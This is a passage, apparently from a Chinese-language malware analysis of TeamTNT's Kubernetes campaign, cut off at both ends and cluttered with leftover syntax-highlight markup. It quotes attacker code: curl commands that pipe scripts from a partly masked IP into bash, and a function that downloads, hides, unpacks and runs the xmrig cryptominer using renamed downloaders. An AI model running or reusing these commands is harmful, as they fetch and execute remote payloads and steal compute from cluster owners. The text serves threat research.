style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">drm </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">--</span></span><span style="color:#48484c"><span style="color:#48484c">install</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">libglvnd</span></span>
<span style="color:#48484c"><span style="color:#48484c"> rm </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">rf $</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">{</span></span><span style="color:#48484c"><span style="color:#48484c">driver_installer_file_name</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">}</span></span>
<span style="color:#93a1a1"><span style="color:#93a1a1">}</span></span></span></span>
非 GCS API 支持:通过 HTTP 直接下载
添加到安装脚本的另一个功能是通过 HTTP 通信通道直接从 Internet 获取 NVIDIA 驱动程序。当 GCA API 无法用于获取驱动程序时,攻击者会使用此选项。可以将其视为直接安装NVIDIA驱动程序的后备选项。下面突出显示的代码验证了这一点:
<span style="color:#333333"><span style="background-color:#f7f7f9"><span style="color:#1e347b"><span style="color:#1e347b">function</span></span><span style="color:#48484c"><span style="color:#48484c"> download_driver_via_http</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">()</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">{</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">local</span></span><span style="color:#48484c"><span style="color:#48484c"> driver_url_path</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">=</span></span><span style="color:#48484c"><span style="color:#48484c">$1</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">local</span></span><span style="color:#48484c"><span style="color:#48484c"> downloaded_file</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">=</span></span><span style="color:#48484c"><span style="color:#48484c">$2</span></span>
<span style="color:#48484c"><span style="color:#48484c"> echo </span></span><span style="color:#dd1144"><span style="color:#dd1144">"Could not use Google Cloud Storage APIs to download drivers. Attempting to download them directly from Nvidia."</span></span>
<span style="color:#48484c"><span style="color:#48484c"> echo </span></span><span style="color:#dd1144"><span style="color:#dd1144">"Downloading driver from URL: ${driver_url_path}"</span></span>
<span style="color:#48484c"><span style="color:#48484c"> wget </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">nv </span></span><span style="color:#dd1144"><span style="color:#dd1144">"${driver_url_path}"</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">O </span></span><span style="color:#dd1144"><span style="color:#dd1144">"${downloaded_file}"</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">||</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">{</span></span>
<span style="color:#48484c"><span style="color:#48484c"> echo </span></span><span style="color:#dd1144"><span style="color:#dd1144">'Download driver via Web failed!'</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">&&</span></span>
<span style="color:#48484c"><span style="color:#48484c"> rm </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">f </span></span><span style="color:#dd1144"><span style="color:#dd1144">"${downloaded_file}"</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">&&</span></span>
<span style="color:#48484c"><span style="color:#48484c"> echo </span></span><span style="color:#dd1144"><span style="color:#dd1144">"${downloaded_file} deleted"</span></span>
<span style="color:#93a1a1"><span style="color:#93a1a1">}</span></span>
<span style="color:#93a1a1"><span style="color:#93a1a1">}</span></span></span></span>
安装加密矿工软件
init.sh 文件获取不同的 Kubernetes 有效负载,这些有效负载使用 curl 命令从远程主机下载到受感染的 Pod,如下所示:
# curl http://45.9.148.XXX/cmd/init.sh | bash
curl http://45.9.148.XXX/cmd/Kubernetes_root_PayLoad_1.sh | bash
curl http://45.9.148.XXX/cmd/Kubernetes_root_PayLoad_2.sh | bash
下面显示的代码突出显示了 TeamTNT 如何在 Kubernetes 集群的主动节点中运行的受感染 pod 上安装加密矿工。该模块反映了如何下载 xmrig.tgz 文件以及将加密矿工安装在受感染的 pod 上。该函数是 Kubernetes_temp_PayLoad_2.sh 文件的一部分,该文件定义要安装的不同有效负载。
<span style="color:#333333"><span style="background-color:#f7f7f9"><span style="color:#1e347b"><span style="color:#1e347b">function</span></span><span style="color:#48484c"><span style="color:#48484c"> DOWNLOAD_FILE</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">(){</span></span>
<span style="color:#48484c"><span style="color:#48484c">echo </span></span><span style="color:#dd1144"><span style="color:#dd1144">"[*] Downloading advanced xmrig to /usr/sbin/.configure/xmrig.tar.gz"</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">if</span></span><span style="color:#48484c"><span style="color:#48484c"> type wget </span></span><span style="color:#195f91"><span style="color:#195f91">2</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">></span></span><span style="color:#dd1144"><span style="color:#dd1144">/dev/</span></span><span style="color:#1e347b"><span style="color:#1e347b">null</span></span> <span style="color:#195f91"><span style="color:#195f91">1</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">></span></span><span style="color:#dd1144"><span style="color:#dd1144">/dev/</span></span><span style="color:#1e347b"><span style="color:#1e347b">null</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">;</span></span> <span style="color:#1e347b"><span style="color:#1e347b">then</span></span><span style="color:#48484c"><span style="color:#48484c"> wget </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">q $XMR_1_BIN_URL </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">O </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">usr</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">sbin</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/.</span></span><span style="color:#48484c"><span style="color:#48484c">configure</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">xmrig</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">.</span></span><span style="color:#48484c"><span style="color:#48484c">tar</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">.</span></span><span style="color:#48484c"><span style="color:#48484c">gz</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">elif</span></span><span style="color:#48484c"><span style="color:#48484c"> type wd1 </span></span><span style="color:#195f91"><span style="color:#195f91">2</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">></span></span><span style="color:#dd1144"><span style="color:#dd1144">/dev/</span></span><span style="color:#1e347b"><span style="color:#1e347b">null</span></span> <span style="color:#195f91"><span style="color:#195f91">1</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">></span></span><span style="color:#dd1144"><span style="color:#dd1144">/dev/</span></span><span style="color:#1e347b"><span style="color:#1e347b">null</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">;</span></span> <span style="color:#1e347b"><span style="color:#1e347b">then</span></span><span style="color:#48484c"><span style="color:#48484c"> wd1 </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">q $XMR_1_BIN_URL </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">O </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">usr</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">sbin</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/.</span></span><span style="color:#48484c"><span style="color:#48484c">configure</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">xmrig</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">.</span></span><span style="color:#48484c"><span style="color:#48484c">tar</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">.</span></span><span style="color:#48484c"><span style="color:#48484c">gz</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">elif</span></span><span style="color:#48484c"><span style="color:#48484c"> type wdl </span></span><span style="color:#195f91"><span style="color:#195f91">2</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">></span></span><span style="color:#dd1144"><span style="color:#dd1144">/dev/</span></span><span style="color:#1e347b"><span style="color:#1e347b">null</span></span> <span style="color:#195f91"><span style="color:#195f91">1</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">></span></span><span style="color:#dd1144"><span style="color:#dd1144">/dev/</span></span><span style="color:#1e347b"><span style="color:#1e347b">null</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">;</span></span> <span style="color:#1e347b"><span style="color:#1e347b">then</span></span><span style="color:#48484c"><span style="color:#48484c"> wdl </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">q $XMR_1_BIN_URL </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">O </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">usr</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">sbin</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/.</span></span><span style="color:#48484c"><span style="color:#48484c">configure</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">xmrig</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">.</span></span><span style="color:#48484c"><span style="color:#48484c">tar</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">.</span></span><span style="color:#48484c"><span style="color:#48484c">gz</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">elif</span></span><span style="color:#48484c"><span style="color:#48484c"> type curl </span></span><span style="color:#195f91"><span style="color:#195f91">2</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">></span></span><span style="color:#dd1144"><span style="color:#dd1144">/dev/</span></span><span style="color:#1e347b"><span style="color:#1e347b">null</span></span> <span style="color:#195f91"><span style="color:#195f91">1</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">></span></span><span style="color:#dd1144"><span style="color:#dd1144">/dev/</span></span><span style="color:#1e347b"><span style="color:#1e347b">null</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">;</span></span> <span style="color:#1e347b"><span style="color:#1e347b">then</span></span><span style="color:#48484c"><span style="color:#48484c"> curl </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">s $XMR_1_BIN_URL </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">o </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">usr</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">sbin</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/.</span></span><span style="color:#48484c"><span style="color:#48484c">configure</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">xmrig</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">.</span></span><span style="color:#48484c"><span style="color:#48484c">tar</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">.</span></span><span style="color:#48484c"><span style="color:#48484c">gz</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">elif</span></span><span style="color:#48484c"><span style="color:#48484c"> type cd1 </span></span><span style="color:#195f91"><span style="color:#195f91">2</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">></span></span><span style="color:#dd1144"><span style="color:#dd1144">/dev/</span></span><span style="color:#1e347b"><span style="color:#1e347b">null</span></span> <span style="color:#195f91"><span style="color:#195f91">1</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">></span></span><span style="color:#dd1144"><span style="color:#dd1144">/dev/</span></span><span style="color:#1e347b"><span style="color:#1e347b">null</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">;</span></span> <span style="color:#1e347b"><span style="color:#1e347b">then</span></span><span style="color:#48484c"><span style="color:#48484c"> cd1 </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">s $XMR_1_BIN_URL </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">o </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">usr</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">sbin</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/.</span></span><span style="color:#48484c"><span style="color:#48484c">configure</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">xmrig</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">.</span></span><span style="color:#48484c"><span style="color:#48484c">tar</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">.</span></span><span style="color:#48484c"><span style="color:#48484c">gz</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">elif</span></span><span style="color:#48484c"><span style="color:#48484c"> type cdl </span></span><span style="color:#195f91"><span style="color:#195f91">2</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">></span></span><span style="color:#dd1144"><span style="color:#dd1144">/dev/</span></span><span style="color:#1e347b"><span style="color:#1e347b">null</span></span> <span style="color:#195f91"><span style="color:#195f91">1</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">></span></span><span style="color:#dd1144"><span style="color:#dd1144">/dev/</span></span><span style="color:#1e347b"><span style="color:#1e347b">null</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">;</span></span> <span style="color:#1e347b"><span style="color:#1e347b">then</span></span><span style="color:#48484c"><span style="color:#48484c"> cdl </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">s $XMR_1_BIN_URL </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">o </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">usr</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">sbin</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/.</span></span><span style="color:#48484c"><span style="color:#48484c">configure</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">xmrig</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">.</span></span><span style="color:#48484c"><span style="color:#48484c">tar</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">.</span></span><span style="color:#48484c"><span style="color:#48484c">gz</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">elif</span></span><span style="color:#48484c"><span style="color:#48484c"> type bash </span></span><span style="color:#195f91"><span style="color:#195f91">2</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">></span></span><span style="color:#dd1144"><span style="color:#dd1144">/dev/</span></span><span style="color:#1e347b"><span style="color:#1e347b">null</span></span> <span style="color:#195f91"><span style="color:#195f91">1</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">></span></span><span style="color:#dd1144"><span style="color:#dd1144">/dev/</span></span><span style="color:#1e347b"><span style="color:#1e347b">null</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">;</span></span> <span style="color:#1e347b"><span style="color:#1e347b">then</span></span><span style="color:#48484c"><span style="color:#48484c"> C_hg_DLOAD $XMR_1_BIN_URL </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">></span></span> <span style="color:#dd1144"><span style="color:#dd1144">/usr/</span></span><span style="color:#48484c"><span style="color:#48484c">sbin</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/.</span></span><span style="color:#48484c"><span style="color:#48484c">configure</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">xmrig</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">.</span></span><span style="color:#48484c"><span style="color:#48484c">tar</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">.</span></span><span style="color:#48484c"><span style="color:#48484c">gz</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">fi</span></span>
<span style="color:#48484c"><span style="color:#48484c">tar </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">xvf </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">usr</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">sbin</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/.</span></span><span style="color:#48484c"><span style="color:#48484c">configure</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">xmrig</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">.</span></span><span style="color:#48484c"><span style="color:#48484c">tar</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">.</span></span><span style="color:#48484c"><span style="color:#48484c">gz </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">C </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">usr</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">sbin</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/.</span></span><span style="color:#48484c"><span style="color:#48484c">configure</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span> <span style="color:#195f91"><span style="color:#195f91">2</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">></span></span><span style="color:#dd1144"><span style="color:#dd1144">/dev/</span></span><span style="color:#1e347b"><span style="color:#1e347b">null</span></span>
<span style="color:#48484c"><span style="color:#48484c">rm </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">f </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">usr</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">sbin</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/.</span></span><span style="color:#48484c"><span style="color:#48484c">configure</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">xmrig</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">.</span></span><span style="color:#48484c"><span style="color:#48484c">tar</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">.</span></span><span style="color:#48484c"><span style="color:#48484c">gz </span></span><span style="color:#195f91"><span style="color:#195f91">2</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">></span></span><span style="color:#dd1144"><span style="color:#dd1144">/dev/</span></span><span style="color:#1e347b"><span style="color:#1e347b">null</span></span> <span style="color:#195f91"><span style="color:#195f91">1</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">></span></span><span style="color:#dd1144"><span style="color:#dd1144">/dev/</span></span><span style="color:#1e347b"><span style="color:#1e347b">null</span></span>
<span style="color:#48484c"><span style="color:#48484c">chmod </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">+</span></span><span style="color:#48484c"><span style="color:#48484c">x </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">usr</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">sbin</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/.</span></span><span style="color:#48484c"><span style="color:#48484c">configure</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">xmrig</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">if</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">[</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">f </span></span><span style="color:#dd1144"><span style="color:#dd1144">"/usr/sbin/.configure/xmrigMiner"</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">];</span></span><span style="color:#1e347b"><span style="color:#1e347b">then</span></span><span style="color:#48484c"><span style="color:#48484c"> chmod </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">+</span></span><span style="color:#48484c"><span style="color:#48484c">x </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">usr</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">sbin</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/.</span></span><span style="color:#48484c"><span style="color:#48484c">configure</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">xmrigMiner</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">;</span></span> <span style="color:#1e347b"><span style="color:#1e347b">fi</span></span>
<span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">usr</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">sbin</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/.</span></span><span style="color:#48484c"><span style="color:#48484c">configure</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">xmrig </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">h </span></span><span style="color:#195f91"><span style="color:#195f91">2</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">></span></span><span style="color:#dd1144"><span style="color:#dd1144">/dev/</span></span><span style="color:#1e347b"><span style="color:#1e347b">null</span></span> <span style="color:#195f91"><span style="color:#195f91">1</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">></span></span><span style="color:#dd1144"><span style="color:#dd1144">/dev/</span></span><span style="color:#1e347b"><span style="color:#1e347b">null</span></span>
<span style="color:#48484c"><span style="color:#48484c">CHECK_XMRIG</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">=</span></span><span style="color:#48484c"><span style="color:#48484c">$</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">?</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">if</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">[[</span></span> <span style="color:#dd1144"><span style="color:#dd1144">"$CHECK_XMRIG"</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">!=</span></span> <span style="color:#dd1144"><span style="color:#dd1144">"0"</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">]];</span></span> <span style="color:#1e347b"><span style="color:#1e347b">then</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">if</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">[</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">f </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">usr</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">sbin</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/.</span></span><span style="color:#48484c"><span style="color:#48484c">configure</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">xmrig </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">]</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">then</span></span><span style="color:#48484c"><span style="color:#48484c"> echo </span></span><span style="color:#dd1144"><span style="color:#dd1144">"WARNING: /usr/sbin/.configure/xmrig is not functional"</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">if</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">[</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">f </span></span><span style="color:#dd1144"><span style="color:#dd1144">"/usr/sbin/.configure/xmrig"</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">];</span></span><span style="color:#1e347b"><span style="color:#1e347b">then</span></span><span style="color:#48484c"><span style="color:#48484c"> rm </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">f </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">usr</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">sbin</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/.</span></span><span style="color:#48484c"><span style="color:#48484c">configure</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">xmrig</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">;</span></span> <span style="color:#1e347b"><span style="color:#1e347b">fi</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">if</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">[</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">f </span></span><span style="color:#dd1144"><span style="color:#dd1144">"/usr/sbin/.configure/xmrigMiner"</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">];</span></span><span style="color:#1e347b"><span style="color:#1e347b">then</span></span><span style="color:#48484c"><span style="color:#48484c"> rm </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">f </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">usr</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">sbin</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/.</span></span><span style="color:#48484c"><span style="color:#48484c">configure</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">xmrigMiner</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">;</span></span> <span style="color:#1e347b"><span style="color:#1e347b">fi</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">else</span></span>
<span style="color:#48484c"><span style="color:#48484c">echo </span></span><span style="color:#dd1144"><span style="color:#dd1144">"WARNING: /usr/sbin/.configure/xmrig was removed"</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">if</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">[</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">f </span></span><span style="color:#dd1144"><span style="color:#dd1144">"/usr/sbin/.configure/xmrigMiner"</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">];</span></span><span style="color:#1e347b"><span style="color:#1e347b">then</span></span><span style="color:#48484c"><span style="color:#48484c"> rm </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">f </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">usr</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">sbin</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/.</span></span><span style="color:#48484c"><span style="color:#48484c">configure</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">xmrigMiner</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">;</span></span> <span style="color:#1e347b"><span style="color:#1e347b">fi</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">fi</span></span>
<span style="color:#93a1a1"><span style="color:#93a1a1"># ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~</span></span>
<span style="color:#93a1a1"><span style="color:#93a1a1">—--</span></span> <span style="color:teal"><span style="color:teal">Truncated</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">—</span></span>
<span style="color:#48484c"><span style="color:#48484c">tar </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">xvf </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">usr</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">sbin</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/.</span></span><span style="color:#48484c"><span style="color:#48484c">configure</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">xmrig</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">.</span></span><span style="color:#48484c"><span style="color:#48484c">tar</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">.</span></span><span style="color:#48484c"><span style="color:#48484c">gz </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span 